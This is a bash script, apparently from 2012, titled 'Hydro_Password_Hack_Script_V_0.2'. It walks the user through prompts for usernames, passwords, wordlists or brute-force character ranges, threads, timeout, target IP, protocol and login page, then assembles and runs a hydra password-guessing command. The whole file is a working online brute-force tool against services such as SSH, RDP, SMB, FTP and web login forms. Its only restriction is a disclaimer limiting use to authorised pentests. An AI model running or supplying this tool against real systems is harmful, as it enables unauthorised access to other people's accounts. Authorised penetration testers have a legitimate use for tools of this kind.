#!/bin/bash
# PLEASE READ AND STUDY BEFORE LAUNCHING
# --------------------------------------------------------------------------------------------------------------------#
# v0.2 17.06.2012
#
# Copyright (C) 2012 Deviney
# This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation; either version 2 of the License, or any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# --------------------------------------------------------------------------------------------------------------------#
# Disclaimer: This script is intended for use only for private study or during an authorised pentest. The author bears no responsibility for malicious or illegal use.
# I sincerely hope skiddies find it overwhelming. (not very likely tho)
# =========================================================================================== #
# "...On The Shoulders Of Giants..." #
# =========================================================================================== #
# Large chunks copied directly from VulpiArgenti's PwnSTAR script #
# #
# I only used parts that made the script look user friendly; the code
# that does the work is my own or has been edited to do a different job.
# =========================================================================================== #
# Thanks to VulpiArgenti; I used his code as a learning base
# ~~~~~~~~~~ Environment Setup ~~~~~~~~~~ #
# Text color variables - saves retyping these awful ANSI codes
# ANSI colour escapes, stored as literal backslash sequences; they only turn
# into real escape codes when printed through `echo -e`.
txtrst='\e[0m'   # reset all attributes
def='\e[1;34m'   # default text: bold blue
warn='\e[1;31m'  # warnings: bold red
info='\e[1;34m'  # informational text: bold blue
q='\e[1;32m'     # questions: bold green
inp='\e[1;36m'   # input variables: bold cyan (SGR colour 36)
### 7 characters = 120 pixels?
# Any /etc entry whose name contains "kde4" is taken as the sign of a KDE desktop.
var=$(ls /etc | grep kde4)
# Only when no such entry exists is the terminal resized to 38 rows x 85
# columns; resize's output (and a missing binary) is silenced.
[[ -n $var ]] || resize -s 38 85 &> /dev/null
printf '%b\n' '\e[0;40m' # black background
clear
# ~~~~~~~~~~ Intro ~~~~~~~~~~ #
# Prints the script's ASCII-art title banner in bold white.
# Arguments: none
# Outputs:   the banner on stdout, followed by one blank line
banner_fn()
{
# %b expands the leading \e colour escape the same way `echo -e` does.
printf '%b\n' '\e[1;37m
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Deviney~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
* ** ******* * *
** * ** * *** ** **
** *** ** * ** ** **
** * ** ** * ** **
** ** *** **** *** ** **** **
** *** *** *** ** **** **** * **** ** *** ** *** * *** * ** ***
** * *** *** ********* ** **** * *** * *** *** ** * *** * **** ** * ***
*** *** ** ** **** ** * **** *** *** *** *** ** ** *** *
** ** ** ** ** ** ** ** *** *** ** ** ** ** ** *
** ** ** ** ** ** ** ** ** *** ** ** ** ** ** *
** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
** ** ** ** ** ** ** ** * * ** ** ** ** ******
** ** ** ** ** *** ** ** *** * ** ** ****** ** ***
** ** *** * ***** *** ***** ** * ********* ** ** **** ** *** *
** ** *** *** *** ** * ***** ** ** ** ***
* * *
* ** *
* *
* *
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Hydro_Password_Hack_Script_V_0.2~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'
}
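# First prompt of the wizard: asks whether one username or a username list
# will be used and hands over to the matching prompt function.
# Globals:   username_options (written); info, q, def, warn (read, colour codes)
# Arguments: none; the answer is read from stdin
# Outputs:   prompt text on stdout
# Returns:   status of the function it dispatches to (exit_fn ends the script)
username_options_fn()
{
  sleep 2
  # From here on Ctrl-C is routed through exit_fn.
  trap exit_fn INT
  username_options=
  echo -e "$info Press ctrl-C at any time to exit neatly\n"
  sleep 1
  # Ask until the answer is one of the listed choices; previously anything
  # other than "q" or "1" was silently treated as "2".
  while true; do
    echo -e "$q Are we using a a single username or a username list? (list has to be text file)"
    sleep 0.5
    echo -e "$def
1) A single username
2) A username list (text file)
q) Exit from the script
"
    # -r keeps backslashes literal; end of input is treated like "q".
    read -r username_options || username_options=q
    case "$username_options" in
      q) exit_fn; return ;;
      1) sin_user_fn; return ;;
      2) list_user_fn; return ;;
      *) echo -e "$warn Please answer 1, 2 or q" ;;
    esac
  done
}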
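# Asks for the single login name to test and records the matching flag.
# Globals:   usernamesign (written: "-l " including its trailing space),
#            username (written); q (read, colour code)
# Arguments: none; the name is read from stdin
# Returns:   status of password_options_fn
sin_user_fn()
{
  clear
  banner_fn
  # The trailing space is part of the value the rest of the script reads.
  usernamesign="-l "
  echo -e "$q What is the username we will be using?"
  # -r: a name such as DOMAIN\user must keep its backslash.
  read -r username
  password_options_fn
}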
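# Asks for the path of a username list file and records the matching flag.
# Globals:   usernamesign (written: "-L " including its trailing space),
#            username (written, holds the file path); q (read, colour code)
# Arguments: none; the path is read from stdin
# Returns:   status of password_options_fn
list_user_fn()
{
  clear
  banner_fn
  # The trailing space is part of the value the rest of the script reads.
  usernamesign="-L "
  # The prompt used to ask for the *password* list here, although the answer
  # is stored as the username list.
  echo -e "$q What is the path to your username list? (E.g root/PasswordList.txt"
  # -r keeps backslashes in the path literal.
  read -r username
  password_options_fn
}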
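# Asks how passwords are supplied (single value, list file or generated) and
# hands over to the matching prompt function.
# Globals:   password_options (written); q, def, warn (read, colour codes)
# Arguments: none; the answer is read from stdin
# Outputs:   prompt text on stdout
# Returns:   status of the function it dispatches to (exit_fn ends the script)
password_options_fn()
{
  clear
  banner_fn
  password_options=
  # Ask until the answer is a listed choice. execute_fn only builds a command
  # for 1, 2 or 3, so any other answer used to walk through every remaining
  # prompt and then run nothing.
  while true; do
    echo -e "$q Are we using a a single password or a password list? (list has to be text file)"
    sleep 0.5
    echo -e "$def
1) A single password
2) A password list (text file)
3) A Bruteforce attack
q) Exit from the script
"
    # -r keeps backslashes literal; end of input is treated like "q".
    read -r password_options || password_options=q
    case "$password_options" in
      q) exit_fn; return ;;
      1) sin_password_fn; return ;;
      2) list_password_fn; return ;;
      3) bruteforce_password_fn; return ;;
      *) echo -e "$warn Please answer 1, 2, 3 or q" ;;
    esac
  done
}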
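# Asks for the single password to test and records the matching flag.
# Globals:   passwordsign (written: "-p " including its trailing space),
#            password (written); q (read, colour code)
# Arguments: none; the password is read from stdin
# Returns:   status of Task_fn
sin_password_fn()
{
  clear
  banner_fn
  # The trailing space is part of the value the rest of the script reads.
  passwordsign="-p "
  echo -e "$q What is the password we will be using?"
  # -r: backslashes in the password must reach hydra unchanged.
  # NOTE(review): execute_fn echoes this value and passes it on hydra's
  # command line, so it is visible on screen and in the local process list.
  read -r password
  Task_fn
}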
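# Asks for the path of a password list file and records the matching flag.
# Globals:   passwordsign (written: "-P " including its trailing space),
#            password (written, holds the file path); q (read, colour code)
# Arguments: none; the path is read from stdin
# Returns:   status of Task_fn
list_password_fn()
{
  clear
  banner_fn
  # The trailing space is part of the value the rest of the script reads.
  passwordsign="-P "
  echo -e "$q What is the path to your password list? (E.g root/PasswordList.txt"
  # -r keeps backslashes in the path literal.
  read -r password
  Task_fn
}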
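# Collects the three values execute_fn joins with passwordsignbreak after the
# -x flag: minimum length, maximum length and character set.
# Globals:   passwordsign ("-x"), passwordsignbreak (":"), brute_min,
#            brute_max, brute_char (all written); q (read, colour code)
# Arguments: none; the three answers are read from stdin, one per line
# Returns:   status of Task_fn
bruteforce_password_fn()
{
  clear
  banner_fn
  brute_min=
  brute_max=
  brute_char=
  # Assigned outright, like the sibling prompt functions do: a ":=" default
  # keeps any value that is already set or inherited from the environment.
  passwordsign="-x"
  passwordsignbreak=":"
  echo -e "$q What is the min amount of charchters in the password?"
  read -r brute_min
  echo -e "$q What is the max amount of charchters in the password?"
  read -r brute_max
  echo -e "$q What charcters will be bruteforced? (do not use any space's E.G 'abcdefghi.@123'"
  # -r: a backslash in the character set is kept as typed.
  read -r brute_char
  Task_fn
}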
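# Asks for the number of parallel connections (the value passed after -t).
# Globals:   task (written); q, warn (read, colour codes)
# Arguments: none; the answer is read from stdin
# Returns:   status of timeout_fn; on end of input it calls exit_fn instead
Task_fn()
{
  clear
  banner_fn
  task=
  # Only a whole number is accepted, so free text never ends up in the
  # argument list that execute_fn assembles.
  while true; do
    echo -e "$q How many parallel connections would you like? (suggest 1-32)"
    read -r task || { exit_fn; return; }
    [[ $task =~ ^[0-9]+$ ]] && break
    echo -e "$warn Please enter a whole number"
  done
  timeout_fn
}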
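# Asks for the connection timeout (the value passed after -w).
# Globals:   timeout (written); q, warn (read, colour codes)
# Arguments: none; the answer is read from stdin
# Returns:   status of ip_address_fn; on end of input it calls exit_fn instead
timeout_fn()
{
  clear
  banner_fn
  timeout=
  # Only a whole number is accepted, so free text never ends up in the
  # argument list that execute_fn assembles.
  while true; do
    echo -e "$q How long would you like a connection to wait before being classed as timed out? (suggest 5-30)"
    read -r timeout || { exit_fn; return; }
    [[ $timeout =~ ^[0-9]+$ ]] && break
    echo -e "$warn Please enter a whole number"
  done
  ip_address_fn
}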
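# Asks for the address of the system under test.
# Globals:   ip (written); q, warn (read, colour codes)
# Arguments: none; the answer is read from stdin
# Returns:   status of protcol_fn; on end of input it calls exit_fn instead
ip_address_fn()
{
  clear
  banner_fn
  ip=
  # An empty answer is rejected: with no address, the next positional
  # argument (the protocol) would sit in the address position of the command.
  while true; do
    echo -e "$q What is the ip of the target?"
    read -r ip || { exit_fn; return; }
    [[ -n $ip ]] && break
    echo -e "$warn A target address is required"
  done
  protcol_fn
}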
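# Asks which protocol to use; the answer "show" lists the known protocols
# instead of continuing.
# Globals:   protcol (written); q (read, colour code)
# Arguments: none; the answer is read from stdin
# Returns:   status of show_protcols_fn or webpage_fn
protcol_fn()
{
  clear
  banner_fn
  protcol=
  echo -e " $q What protcol will you be using?? (Enter 'show' to see the protcols available)"
  # -r keeps the answer exactly as typed.
  read -r protcol
  case "$protcol" in
    show) show_protcols_fn ;;
    *) webpage_fn ;;
  esac
}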
# Lists the protocol names on screen, waits for Enter, then goes back to the
# protocol question.
# Arguments: none; one line is consumed from stdin as the "press enter"
# Outputs:   the protocol list on stdout
# Returns:   status of protcol_fn
show_protcols_fn()
{
  clear
  banner_fn
  # One argument per output line; the empty argument is the blank separator.
  printf '%s\n' \
    "AFP, Cisco AAA, Cisco auth, Cisco enable" \
    "CVS, Firebird, FTP, HTTP-FORM-GET" \
    "HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY" \
    "HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD" \
    "HTTP-Proxy, ICQ, IMAP, IRC" \
    "LDAP, MS-SQL, MYSQL, NCP" \
    "NNTP, Oracle Listener, Oracle, Oracle SID" \
    "PC-Anywhere, PCNFS, POP3, POSTGRES" \
    "RDP, Rexec, Rlogin, Rsh" \
    "SAP/R3, SIP, SMB, SMTP" \
    "SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2)" \
    "Subversion, Teamspeak (TS2), Telnet, VMware-Auth" \
    "VNC, XMPP" \
    "" \
    "Press enter to return back to the prevouise question"
  # The line read here is discarded; it only pauses until Enter.
  read
  protcol_fn
}
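# Asks for the path of the login page on the system under test.
# Globals:   webpage (written); q (read, colour code)
# Arguments: none; the answer is read from stdin
# Returns:   status of execute_fn
webpage_fn()
{
  clear
  banner_fn
  webpage=
  # The prompt used to call '/' a backslash; it is a forward slash.
  echo -e "$q What is the webpage of the target login screen? (if there is no page after the IP address just enter a forward slash '/'"
  # -r keeps the path exactly as typed.
  read -r webpage
  execute_fn
}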
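# Assembles the hydra command line from the answers collected by the prompt
# functions, prints it, then runs it.
# Globals (read): password_options, usernamesign, username, passwordsign,
#                 password, brute_min, brute_max, brute_char,
#                 passwordsignbreak, task, timeout, ip, protcol, webpage, warn
# Arguments: none
# Outputs:   the command line in the warning colour, then hydra's own output
# Returns:   hydra's exit status, or 1 when password_options is not 1, 2 or 3
execute_fn()
{
  clear
  banner_fn
  # One array element per option or value: an answer containing spaces or
  # glob characters reaches hydra as a single, unmodified argument instead of
  # being split or expanded by the shell. The flag variables may carry a
  # trailing space ("-l "), which is stripped here.
  local -a cmd=(hydra "${usernamesign%% *}" "$username")
  case "$password_options" in
    [1-2])
      cmd+=("${passwordsign%% *}" "$password")
      ;;
    3)
      cmd+=("${passwordsign%% *}" "$brute_min$passwordsignbreak$brute_max$passwordsignbreak$brute_char")
      ;;
    *)
      # Previously this case fell through silently and nothing was run.
      echo -e "$warn No password mode was selected (expected 1, 2 or 3); nothing to run"
      return 1
      ;;
  esac
  cmd+=(-e nsr -t "$task" -w "$timeout" -V "$ip" "$protcol")
  # An empty page answer is left out rather than passed as an empty argument.
  if [[ -n $webpage ]]; then
    cmd+=("$webpage")
  fi
  # NOTE(review): the line echoed below and hydra's argument list both contain
  # the password in clear text, so it shows up in terminal scrollback and in
  # the local process list for as long as the command runs.
  echo -e "$warn ${cmd[*]}"
  "${cmd[@]}"
}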
# Ends the script: wipes the terminal, then exits with status 0.
# Installed by username_options_fn as the Ctrl-C (INT) handler and called by
# the menus when "q" is chosen.
exit_fn()
{
  clear; exit 0
}
# ~~~~~~~~~~ Main Script ~~~~~~~~~~ #
# Entry point: draw the banner once, then start the chain of prompt
# functions; each prompt calls the next one and the last one is execute_fn.
banner_fn; username_options_fn